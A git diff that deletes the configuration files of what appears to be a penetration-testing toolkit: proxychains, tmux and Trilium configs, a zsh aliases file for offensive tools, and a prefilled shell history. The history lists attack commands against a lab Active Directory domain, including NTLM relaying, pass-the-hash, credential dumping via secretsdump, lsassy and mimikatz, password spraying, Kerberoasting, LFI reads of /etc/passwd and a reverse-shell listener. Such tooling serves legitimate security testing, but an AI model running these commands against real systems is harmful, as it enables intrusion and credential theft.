--git a/sources/proxychains/proxychains.conf b/sources/proxychains/proxychains.conf deleted file mode 100644 index 22a65be6..00000000 --- a/sources/proxychains/proxychains.conf +++ /dev/null @@ -1,154 +0,0 @@ -# proxychains.conf VER 4.x -# -# HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS. - - -# The option below identifies how the ProxyList is treated. -# only one option should be uncommented at time, -# otherwise the last appearing option will be accepted -# -#dynamic_chain -# -# Dynamic - Each connection will be done via chained proxies -# all proxies chained in the order as they appear in the list -# at least one proxy must be online to play in chain -# (dead proxies are skipped) -# otherwise EINTR is returned to the app -# -strict_chain -# -# Strict - Each connection will be done via chained proxies -# all proxies chained in the order as they appear in the list -# all proxies must be online to play in chain -# otherwise EINTR is returned to the app -# -#round_robin_chain -# -# Round Robin - Each connection will be done via chained proxies -# of chain_len length -# all proxies chained in the order as they appear in the list -# at least one proxy must be online to play in chain -# (dead proxies are skipped). -# the start of the current proxy chain is the proxy after the last -# proxy in the previously invoked proxy chain. -# if the end of the proxy chain is reached while looking for proxies -# start at the beginning again. -# otherwise EINTR is returned to the app -# These semantics are not guaranteed in a multithreaded environment. -# -#random_chain -# -# Random - Each connection will be done via random proxy -# (or proxy chain, see chain_len) from the list. -# this option is good to test your IDS :) - -# Make sense only if random_chain or round_robin_chain -#chain_len = 2 - -# Quiet mode (no output from library) -#quiet_mode - -## Proxy DNS requests - no leak for DNS data -# (disable all of the 3 items below to not proxy your DNS requests) - -# method 1. this uses the proxychains4 style method to do remote dns: -# a thread is spawned that serves DNS requests and hands down an ip -# assigned from an internal list (via remote_dns_subset). -# this is the easiest (setup-wise) and fastest method, however on -# systems with buggy libcs and very complex software like webbrosers -# this might not work and/or cause crashes. -proxy_dns - -# method 2. use the old proxyresolv script to proxy DNS requests -# in proxychains 3.1 style. requires `proxyresolv` in $PATH -# plus a dynamically linked `dig` binary. -# this is a lot slower than `proxy_dns`, doesn't support .onion URLs, -# but might be more compatible with complex software like webbrowsers. -#proxy_dns_old - -# method 3. use proxychains4-daemon process to serve remote DNS requests. -# this is similar to the threaded `proxy_dns` method, however it requires -# that proxychains4-daemon is already running on the specified address. -# on the plus side it doesn't do malloc/threads so it should be quite -# compatible with complex, async-unsafe software. -# note that if you don't start proxychains4-daemon before using this, -# the process will simply hang. -#proxy_dns_daemon 127.0.0.1:1053 - -# set the class A subnet number to use for the internal remote DNS mapping -# we use the reserved 224.x.x.x range by default, -# if the proxified app does a DNS request, we will return an IP from that range. -# on further accesses to this ip we will send the saved DNS name to the proxy. -# in case some control-freak app checks the returned ip, and denies to -# connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x. -# of course you should make sure that the proxified app does not need -# *real* access to this subnet. -# i.e. dont use the same subnet then in the localnet section -#remote_dns_subnet 127 -#remote_dns_subnet 10 -remote_dns_subnet 224 - -# Some timeouts in milliseconds -tcp_read_time_out 15000 -tcp_connect_time_out 8000 - -### Examples for localnet exclusion -## localnet ranges will *not* use a proxy to connect. -## Exclude connections to 192.168.1.0/24 with port 80 -# localnet 192.168.1.0:80/255.255.255.0 - -## Exclude connections to 192.168.100.0/24 -# localnet 192.168.100.0/255.255.255.0 - -## Exclude connections to ANYwhere with port 80 -# localnet 0.0.0.0:80/0.0.0.0 - -## RFC5735 Loopback address range -## if you enable this, you have to make sure remote_dns_subnet is not 127 -## you'll need to enable it if you want to use an application that -## connects to localhost. -# localnet 127.0.0.0/255.0.0.0 - -## RFC1918 Private Address Ranges -# localnet 10.0.0.0/255.0.0.0 -# localnet 172.16.0.0/255.240.0.0 -# localnet 192.168.0.0/255.255.0.0 - -### Examples for dnat -## Trying to proxy connections to destinations which are dnatted, -## will result in proxying connections to the new given destinations. -## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443 -# dnat 1.1.1.1:1234 1.1.1.2:443 - -## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443 -## (no need to write :443 again) -# dnat 1.1.1.2:443 1.1.1.2 - -## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443 -# dnat 1.1.1.1 1.1.1.2:443 - -## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2 -# dnat 1.1.1.1 1.1.1.2 - -# ProxyList format -# type ip port [user pass] -# (values separated by 'tab' or 'blank') -# -# only numeric ipv4 addresses are valid -# -# -# Examples: -# -# socks5 192.168.67.78 1080 lamer secret -# http 192.168.89.3 8080 justu hidden -# socks4 192.168.1.49 1080 -# http 192.168.39.93 8080 -# -# -# proxy types: http, socks4, socks5, raw -# * raw: The traffic is simply forwarded to the proxy without modification. -# ( auth types supported: "basic"-http "user/pass"-socks ) -# -[ProxyList] -# add proxy here ... -socks4 127.0.0.1 1080 \ No newline at end of file diff --git a/sources/tmux/tmux.conf b/sources/tmux/tmux.conf deleted file mode 100644 index 987ceedf..00000000 --- a/sources/tmux/tmux.conf +++ /dev/null @@ -1,3 +0,0 @@ -set-option -g default-shell /bin/zsh - - diff --git a/sources/trilium/config.ini b/sources/trilium/config.ini deleted file mode 100644 index 0a862a40..00000000 --- a/sources/trilium/config.ini +++ /dev/null @@ -1,23 +0,0 @@ -[General] -# Instance name can be used to distinguish between different instances using backend api.getInstanceName() -instanceName= - -# set to true to allow using Trilium without authentication (makes sense for server build only, desktop build doesn't need password) -noAuthentication=false - -# set to true to disable backups (e.g. because of limited space on server) -noBackup=false - -# Disable automatically generating desktop icon -# noDesktopIcon=true - -[Network] -# host setting is relevant only for web deployments - set the host on which the server will listen -# host=0.0.0.0 -# port setting is relevant only for web deployments, desktop builds run on a fixed port (changeable with TRILIUM_PORT environment variable) -port=1991 -# true for TLS/SSL/HTTPS (secure), false for HTTP (unsecure). -https=false -# path to certificate (run "bash bin/generate-cert.sh" to generate self-signed certificate). Relevant only if https=true -certPath= -keyPath= diff --git a/sources/trilium/document.db b/sources/trilium/document.db deleted file mode 100644 index 0ff59a5f..00000000 Binary files a/sources/trilium/document.db and /dev/null differ diff --git a/sources/trilium/document.db-shm b/sources/trilium/document.db-shm deleted file mode 100644 index 96ec25ae..00000000 Binary files a/sources/trilium/document.db-shm and /dev/null differ diff --git a/sources/trilium/document.db-wal b/sources/trilium/document.db-wal deleted file mode 100644 index 8c07b8a9..00000000 Binary files a/sources/trilium/document.db-wal and /dev/null differ diff --git a/sources/zsh/aliases b/sources/zsh/aliases deleted file mode 100644 index 2e60e386..00000000 --- a/sources/zsh/aliases +++ /dev/null @@ -1,162 +0,0 @@ -#alias mitm6='python3 /opt/tools/mitm6/mitm6/mitm6.py' -alias l='ls -alh' -alias ipa='ip --brief --color a' -alias nse='ls /usr/share/nmap/scripts | grep ' -alias scan-range='nmap -T5 -n -sn' -alias http-server='python3 -m http.server' -alias php-server='php -S 127.0.0.1:8080 -t .' -alias ftp-server='python3 -m pyftpdlib -u "mario" -P "m4r10" -p 2121' -alias powershell='pwsh' -alias responder='python3 /opt/tools/Responder/Responder.py' -alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='" -alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" -alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='" -alias sublist3r='python3 /opt/tools/Sublist3r/sublist3r.py' -alias recondog='python3 /opt/tools/ReconDog/dog' -alias cloudfail='python3 /opt/tools/CloudFail/cloudfail.py' -alias oneforall='python3 /opt/tools/OneForAll/oneforall/oneforall.py' -alias eyewitness='python3 /opt/tools/EyeWitness/EyeWitness.py' -alias XSStrike='python3 /opt/tools/XSStrike/xsstrike.py' -alias bolt='python3 /opt/tools/Bolt/bolt.py' -alias ntlmrelayx='grc ntlmrelayx.py' -alias secretsdump='grc secretsdump.py' -alias bloodhound.py='python3 /opt/tools/BloodHound.py/bloodhound.py' -alias dementor.py='python /opt/tools/dementor/dementor.py' -alias grc='grc ' -alias ms14-068.py='python /opt/tools/pykek/ms14-068.py' -alias autorecon='/opt/tools/AutoRecon/autorecon.py -o autorecon' -alias linkfinder='python3 /opt/tools/LinkFinder/linkfinder.py' -alias ssrfmap='cd /opt/tools/SSRFmap && echo "[*] changed dir : cd /opt/tools/SSRFmap/" && python3 /opt/tools/SSRFmap/ssrfmap.py' -alias nosqlmap='python2 /opt/tools/NoSQLMap/nosqlmap.py' -alias fuxploider='cd /opt/tools/fuxploider && echo "[*] changed dir : cd /opt/tools/fuxploider/" && python3 fuxploider.py' -alias corscanner='python3 /opt/tools/CORScanner/cors_scan.py' -alias blazy='python /opt/tools/Blazy/blazy.py' -alias icebreaker='cd /opt/tools/icebreaker/ && echo "[*] changed dir : cd /opt/tools/icebreaker/" && echo "[*] Run: pipenv --shell Then: python3 icebreaker.py"' -alias empire='cd /opt/tools/Empire/ && echo "[*] changed dir : cd /opt/tools/Empire/" && python3 empire' -alias deathstar='python3 /opt/tools/DeathStar/DeathStar.py' -alias privexchange.py='python3 /opt/tools/PrivExchange/privexchange.py' -alias lnk-generate.py='python /opt/tools/LNKUp/generate.py' -alias gdb='gdb -q' -alias darkarmour='cd /opt/tools/darkarmour/ && echo "[*] changed dir : cd /opt/tools/darkarmour/" && python3 darkarmour.py' -alias fzf-wordlists='find /usr/share/seclists /usr/share/wordlists /usr/share/dirbuster /usr/share/wfuzz /usr/share/dirb -type f | fzf' -alias kadimus='cd /opt/tools/Kadimus && echo "[*] changed dir : cd /opt/tools/Kadimus/" && /opt/tools/Kadimus/kadimus' -alias fimap='/opt/tools/fimap/src/fimap.py' -alias jwt_tool='python3 /opt/tools/jwt_tool/jwt_tool.py' -alias rbcd-attack='python3 /opt/tools/rbcd-attack/rbcd.py' -alias addspn.py='python3 /opt/tools/krbrelayx/addspn.py' -alias dnstool.py='python /opt/tools/krbrelayx/dnstool.py' -alias printerbug.py='python3 /opt/tools/krbrelayx/printerbug.py' -alias krbrelayx.py='python3 /opt/tools/krbrelayx/krbrelayx.py' -alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1])"' -alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"' -alias enyx='python /opt/tools/Enyx/enyx.py' -alias starkiller='echo "Starkiller has a GUI, cant run on exegol: run empire-rest on exegol, then starkiller on host"' -alias empire-rest='empire --rest --username admin --password admin' -alias enum4linux-ng='/opt/tools/enum4linux-ng/enum4linux-ng.py' -alias git-dumper='/opt/tools/git-dumper/git_dumper.py' -alias gopherus='/opt/tools/Gopherus/gopherus.py' -alias ysoserial='java -jar /opt/tools/ysoserial/ysoserial.jar' -alias john='/opt/tools/john/run/john' -alias zerologon-exploit='python3 /opt/tools/zerologon-exploit/cve-2020-1472-exploit.py' -alias zerologon-scan='python3 /opt/tools/zerologon-scan/zerologon_tester.py' -alias zerologon-restore='python3 /opt/tools/zerologon-exploit/restorepassword.py' -alias a='/opt/tools/arsenal/run' -alias bloodhound='/opt/tools/BloodHound4/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage' -alias bloodhound_old_v3='/opt/tools/BloodHound3/BloodHound --no-sandbox --disable-dev-shm-usage' -alias bloodhound_old_v2='/opt/tools/BloodHound2/BloodHound --no-sandbox --disable-dev-shm-usage' -alias rickroll='curl tiredand.gay/rick' -alias gitdumper='/opt/tools/GitTools/Dumper/gitdumper.sh' -alias bettercap-ui='bettercap -caplet http-ui' -alias xcopy='xsel --clipboard <' -alias xpaste='xsel --clipboard >' -alias xshow='xsel --clipboard' -alias infoga.py='python /opt/tools/Infoga/infoga.py' -alias oaburl.py='python3 /opt/tools/OABUrl/oaburl.py' -alias oabextract='/opt/tools/libmspack/libmspack/examples/oabextract' -alias ruler='/opt/tools/ruler/ruler' -alias ghidra='/opt/tools/ghidra_9.2.3_PUBLIC/ghidraRun' -alias cypheroth='/opt/tools/cypheroth/cypheroth.sh' -alias sherlock='python3 /opt/tools/sherlock/sherlock/sherlock.py' -alias sed-empty-line='sed /^$/d' -alias xmlcat='xmllint --format' -alias http-put-server='python3 /opt/resources/linux/http-put-server.py --bind 0.0.0.0' -alias rbcd-permissions='python3 /opt/tools/rbcd_permissions/rbcd.py' -alias trilium-start='echo "Starting server on http://$(cat ~/.local/share/trilium-data/config.ini | grep host= | cut -d = -f 2):$(cat ~/.local/share/trilium-data/config.ini | grep port= | cut -d = -f 2)/" && nohup node /opt/tools/trilium/src/www &> ~/.trilium.nohup.out &' -alias trilium-stop='fuser -k $(cat ~/.local/share/trilium-data/config.ini | grep port= | cut -d = -f 2)/tcp' -alias ntlmv1-multi='python3 /opt/tools/ntlmv1-multi/ntlmv1.py' -alias SimplyEmail='cd /opt/tools/SimplyEmail/ && echo "[*] changed dir : cd /opt/tools/SimplyEmail/" && python SimplyEmail.py' -alias linkedin2username.py='python3 /opt/tools/linkedin2username/linkedin2username.py' -alias toutatis.py='python3 /opt/tools/toutatis/toutatis.py' -alias carbon14.py='python3 /opt/tools/Carbon14/carbon14.py' -alias gephi='/opt/tools/gephi/bin/gephi' -alias WikiLeaker='python3 /opt/tools/WikiLeaker/WikiLeaker.py' -alias photon.py='python3 /opt/tools/photon/photon.py' -alias cloudfail.py='cd /opt/tools/CloudFail/ && echo "[*] changed dir : cd /opt/tools/CloudFail/" && python3 cloudfail.py' -alias constellation='/opt/tools/constellation/bin/constellation' -alias osintgram='cd /opt/tools/Osintgram/ && echo "[*] changed dir : cd /opt/tools/Osintgram/" && python3 main.py' -alias pwnedornot.py='python3 /opt/tools/pwnedOrNot/pwnedornot.py' -alias ghunt='cd /opt/tools/GHunt/ && echo "[*] changed dir : cd /opt/tools/GHunt/" && python3 hunt.py ' -alias ghunt-config='cd /opt/tools/GHunt/ && echo "[*] changed dir : cd /opt/tools/GHunt/" && python3 check_and_gen.py' -alias mfdread='python3 /opt/tools/mfdread/mfdread.py' -alias libnfc_crypto1_crack='/opt/tools/crypto1_bs/libnfc_crypto1_crack' -alias nrf24-continuous-tone-test.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-continuous-tone-test.py' -alias nrf24-network-mapper.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-network-mapper.py' -alias nrf24-scanner.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-scanner.py' -alias nrf24-sniffer.py='/opt/tools/mousejack/nrf-research-firmware/tools/nrf24-sniffer.py' -alias proxychains4='proxychains4 ' -alias proxychains='proxychains4 ' -alias testssl='/opt/tools/testssl.sh/testssl.sh' -alias multirelay='python3 /opt/tools/Responder/tools/MultiRelay.py' -alias runfinger='python3 /opt/tools/Responder/tools/RunFinger.py' -alias phpggc='/opt/tools/phpggc/phpggc' -alias secret_fragment_exploit.py='/opt/tools/symfony-exploits/secret_fragment_exploit.py' -alias cachedump.py='/opt/tools/creddump/cachedump.py' -alias lsadump.py='/opt/tools/creddump/lsadump.py' -alias pwdump.py='/opt/tools/creddump/pwdump.py' -alias jdwp-shellifier.py='/opt/tools/jdwp-shellifier/jdwp-shellifier.py' -alias dnschef='/opt/tools/dnschef/dnschef.py' -alias h2csmuggler='/opt/tools/h2csmuggler/h2csmuggler.py' -alias byp4xx='python3 /opt/tools/byp4xx/byp4xx.py' -alias volatility='python /opt/tools/volatility/vol.py' -alias vol='volatility' -alias pygpoabuse='python3 /opt/tools/pyGPOAbuse/pygpoabuse.py' -alias rsactftool='python3 /opt/tools/RsaCtfTool/RsaCtfTool.py' -alias bloodhound-quickwin='python3 /opt/tools/bloodhound-quickwin/bhqc.py' -alias bhqc.py='python3 /opt/tools/bloodhound-quickwin/bhqc.py' -alias cme='grc crackmapexec' -alias airodump-ng='airodump-ng --wps' -alias ntlm-scanner='/opt/tools/ntlm-scanner/scan.py' -alias ldapsearch-ad='python3 /opt/tools/ldapsearch-ad/ldapsearch-ad.py' -alias Get-GPPPassword='grc Get-GPPPassword.py' -alias trid='LC_ALL=C /opt/tools/trid/trid' -alias PCredz='python3 /opt/tools/PCredz/Pcredz' -alias rbcd='grc rbcd.py' -alias tomcatWarDeployer='python /opt/tools/tomcatWarDeployer/tomcatWarDeployer.py' -alias moodlescan='python3 /opt/tools/moodlescan/moodlescan.py' -alias rsf='python3 /opt/tools/routersploit/rsf.py' -alias petitpotam.py='python3 /opt/tools/PetitPotam/PetitPotam.py' -alias getnthash.py='python3 /opt/tools/PKINITtools/getnthash.py' -alias gets4uticket.py='python3 /opt/tools/PKINITtools/gets4uticket.py' -alias gettgtpkinit.py='python3 /opt/tools/PKINITtools/gettgtpkinit.py' -alias pywhisker.py='python3 /opt/tools/pywhisker/pywhisker.py' -alias targetedKerberoast.py='python3 /opt/tools/targetedKerberoast/targetedKerberoast.py' -alias pywsus.py='python3 /opt/tools/pywsus/pywsus.py' -alias krbrelayx='grc krbrelayx.py' -alias DonPAPI='python3 /opt/tools/DonPAPI/DonPAPI.py' -alias eaphammer='python3 /opt/tools/eaphammer/eaphammer' -alias describeTicket='grc describeTicket.py' -alias vulny-code-static-analysis='python3 /opt/tools/Vulny-Code-Static-Analysis/index.py' -alias php-code-analysis='python3 /opt/tools/Vulny-Code-Static-Analysis/index.py' -alias GPOwned='python3 /opt/tools/GPOwned/GPOwned.py' -alias pwndb='python3 /opt/tools/pwndb/pwndb.py' -alias shadowcoerce.py='/opt/tools/ShadowCoerce/shadowcoerce.py' -alias dcsync.py='python3 /opt/tools/DCSync/dcsync.py' -alias gMSADumper.py='python3 /opt/tools/gMSADumper/gMSADumper.py' -alias modifyCertTemplate.py='python3 /opt/tools/modifyCertTemplate/modifyCertTemplate.py' -alias cme-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.cme/cme.conf' -alias cme-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.cme/cme.conf' -alias pyLAPS.py='python3 /opt/tools/pyLAPS/pyLAPS.py' -alias FindUncommonShares.py='python3 /opt/tools/FindUncommonShares/FindUncommonShares.py' -alias LdapRelayScan.py='python3 /opt/tools/LdapRelayScan/LdapRelayScan.py' -alias goldencopy.py='python3 /opt/tools/GoldenCopy/goldencopy.py' \ No newline at end of file diff --git a/sources/zsh/history b/sources/zsh/history deleted file mode 100644 index 89c11021..00000000 --- a/sources/zsh/history +++ /dev/null @@ -1,342 +0,0 @@ -responder --interface eth0 --analyze --disable-ess -responder --interface eth0 --wpad --lm --disable-ess -responder-http-off -responder-http-on -responder-smb-off -responder-smb-on -bloodhound.py -c All -d breaking.bad -u anonymous -p anonymous -dc DC01.BREAKING.BAD -bloodhound.py -c All -d breaking.bad -u anonymous --hashes 'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -dc DC01.BREAKING.BAD -nslookup _ldap._tcp.dc._msdcs.BREAKING.BAD -nslookup -type=srv _kerberos._tcp.BREAKING.BAD -nslookup -type=srv _gc._tcp.BREAKING.BAD -nslookup -type=srv _kpasswd._tcp.BREAKING.BAD -nslookup -type=srv _ldap._tcp.BREAKING.BAD -nslookup -type=srv _ldap._tcp.dc._msdcs.BREAKING.BAD -nbtscan -r 192.168.56.0/24 -nmap --script dns-srv-enum --script-args dns-srv-enum.domain=BREAKING.BAD -mount -o domain='BREAKING.BAD' -o username='someuser' -o password='somepassword' -t cifs '//DC01.BREAKING.BAD/SYSVOL' /tmp/mnttarget/ -rpcdump.py DC01.BREAKING.BAD | grep -A 6 MS-RPRN -rpcdump.py DC02.BREAKING.BAD | grep -A 6 MS-RPRN -dementor.py -d breaking.bad -u anonymous -p anonymous 192.168.56.1 DC02.BREAKING.BAD -printerbug.py "breaking.bad"/"anonymous":"anonymous"@"DC02.BREAKING.BAD" 192.168.56.1 -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --add-computer SHUTDOWN --delegate-access -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN --delegate-access -ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN 123soleil --delegate-access -ntlmrelayx -t ldap://DC01.BREAKING.BAD -smb2support --escalate-user SHUTDOWN -curl --ntlm -u "someuser":"somepassword" 127.0.0.1 -getST.py -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 BREAKING.BAD/'SHUTDOWN$':123soleil -getST.py -force-forwardable -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 -hashes :01234567890sv01nthash01234567890 BREAKING.BAD/SV01 -secretsdump -k -outputfile BREAKING.BAD DC02.BREAKING.BAD -secretsdump -outputfile BREAKING.BAD -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -secretsdump -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -rpcclient -U '' -N DC01.BREAKING.BAD -rpcclient -U BREAKING/anonymous 192.168.56.101 -pth-net rpc group members 'Domain admins' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD' -pth-net rpc group addmem 'Domain admins' 'Shutdown' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD' -cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt -mitm6 --interface eth0 -mitm6 --interface eth0 --domain BREAKING.BAD -responder --interface eth0 --wpad --lm --ProxyAuth --disable-ess -ntlmrelayx -tf targets.txt -w -6 -smb2support -socks -proxychains secretsdump -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains smbexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains psexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains atexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains wmiexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains dcomexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD -proxychains lsassy -d BREAKING.BAD -u Administrator -p 'p@ssword' -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD -psexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -smbexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -wmiexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -wmiexec.py -codec cp850 -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -atexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD -cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M enum_avproducts -cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M mimikatz -cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy -cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=exegol4thewin -sprayhound -d 'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous' -p 'azerty' -sprayhound -d 'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous' -lsassy -v -u 'Administrator' -H a88baa3fdc8f581ee0fb05d7054d43e4 -K lsass_loot -o lsass_creds.txt 192.168.56.0/24 -lsassy -v -d 'BREAKING.BAD' -u 'Administrator' -p 'passw0rd' -K lsass_loot -o lsass_creds.txt 192.168.56.0/24 -export KRB5CCNAME=Administrator.ccache -lsassy -k -d BREAKING.BAD -u Administrator -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD -masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24 -masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24 -gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/ -kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411 -kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411 -kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1 -kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D -kr scan https://target.com:8443/ -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -kr scan target.com -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -kr scan targets.txt -w /opt/tools/kiterunner/routes-small.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -cme smb 192.168.56.0/24 -u anonymous -p anonymous --shares -cme smb 192.168.56.0/24 -u '' -p '' --shares -cme smb 192.168.56.0/24 -u anonymous -p anonymous --sessions -cme smb 192.168.56.0/24 -u anonymous -p anonymous --loggedon-users -cme smb 192.168.56.0/24 --local-auth -u '' -p '' -privexchange.py -ah 192.168.56.1 -d BREAKING.BAD -u anonymous -p anonymous EXCHANGE.BREAKING.BAD -neo4j start -lnk-generate.py --host 192.168.56.1 --type ntlm --output '@SHUTDOWN-LNK.lnk' -autorecon 192.168.10.10 -nmap --script=ldap-search -p 389 192.168.10.10 -nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10 -dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt -gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u http://192.168.10.10/ -smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -onesixtyone 192.168.10.10 private -onesixtyone 192.168.10.10 public -onesixtyone 192.168.10.10 manager -onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10 -snmpwalk -c public -v 1 192.168.10.10 -snmpwalk -c public -v 2c 192.168.10.10 -cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10 -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-detection aggressive -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --enumerate u1-20 -nmblookup -A 192.168.10.10 -nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10 -smbmap -H 192.168.10.10 -smbmap -u guest -H 192.168.10.10 -smbmap -H 192.168.10.10 -R -smbmap -H 192.168.10.10 -R test -smbclient --list 192.168.10.10 -smbclient --no-pass --user '' //192.168.10.10/SYSVOL -smbclient --no-pass --user '' --list 192.168.10.10 -smbclient.py BREAKING.BAD/user:astrongpassword@192.168.56.201 -nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10 -amap -d 192.168.10.10 4455 -nikto -host 192.168.10.10 -dotdotpwn -m payload -h 192.168.10.10 -x 80 -p request.req -k 'root:' -f /etc/passwd -dotdotpwn -m stdout -d 5 -f /etc/passwd -kadimus -u 'http://192.168.10.10/?page=file1.php' -kadimus --cookie 'PHPSESSID=qsh5s21mo54qds7v5384f1q34' -u 'http://192.168.10.10/?page=file1.php' -shellerator --reverse-shell --ip 192.168.56.1 --port 1337 --type powershell -shellerator -rlwrap nc -lvnp 1337 -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/ -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip 192.168.56.101 BREAKING.BAD/ -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator -hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt `fzf-wordlists` -john --wordlist=`fzf-wordlists` ASREProastables.txt -GetUserSPNs.py -outputfile Kerberoastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous 